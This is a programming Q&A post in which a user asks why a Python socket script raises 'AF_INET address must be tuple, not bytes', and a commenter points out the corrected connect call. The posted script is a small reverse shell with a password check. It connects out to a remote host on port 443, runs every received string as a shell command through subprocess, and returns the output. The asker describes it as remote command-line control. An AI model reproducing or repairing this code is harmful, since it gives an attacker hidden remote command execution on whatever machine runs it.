# I get the error TypeError: getsockaddrarg: AF_INET address must be tuple, not bytes

Tags: python, python-sockets

I have asked a similair question before, but the fix did not work this time....

Aright, when i use the tagged code, i get the error mentioned in the title. Not sure how to fix it :(.

Code:

```
import subprocess
import socket
host = (b"192.168")
port = 443
connectie = (host,port)
passwd = (b"TheOnlyCode1_")
def Login():
    global s
    s.send("Login: ")
    pwd = s.recv(1024)

    if pwd.strip() != passwd:
        Login()
    else:
        s.send("Verbonden >> ")
        Shell()

def Shell():
    while True:
        data = s.recv(1024)

        if data.strip() == stop:
            break
        proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        output = proc.stdout.read() + proc.stderr.read()
        s.send(output)
        s.send(">> ")


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (host), port
Login()
```

The code is meant to create a session for remote commandline control.

Comment: Second line from bottom (is this your error?) should be `s.connect((host,port))`

Comment: Thanks! This was indeed my error, but Python hates me so never gives the line where it went wrong :S

Comment: Then you're using a very weird version of Python as most Python interpreters out there will print you the stack trace of the last frame where the unhanlded exception occurred.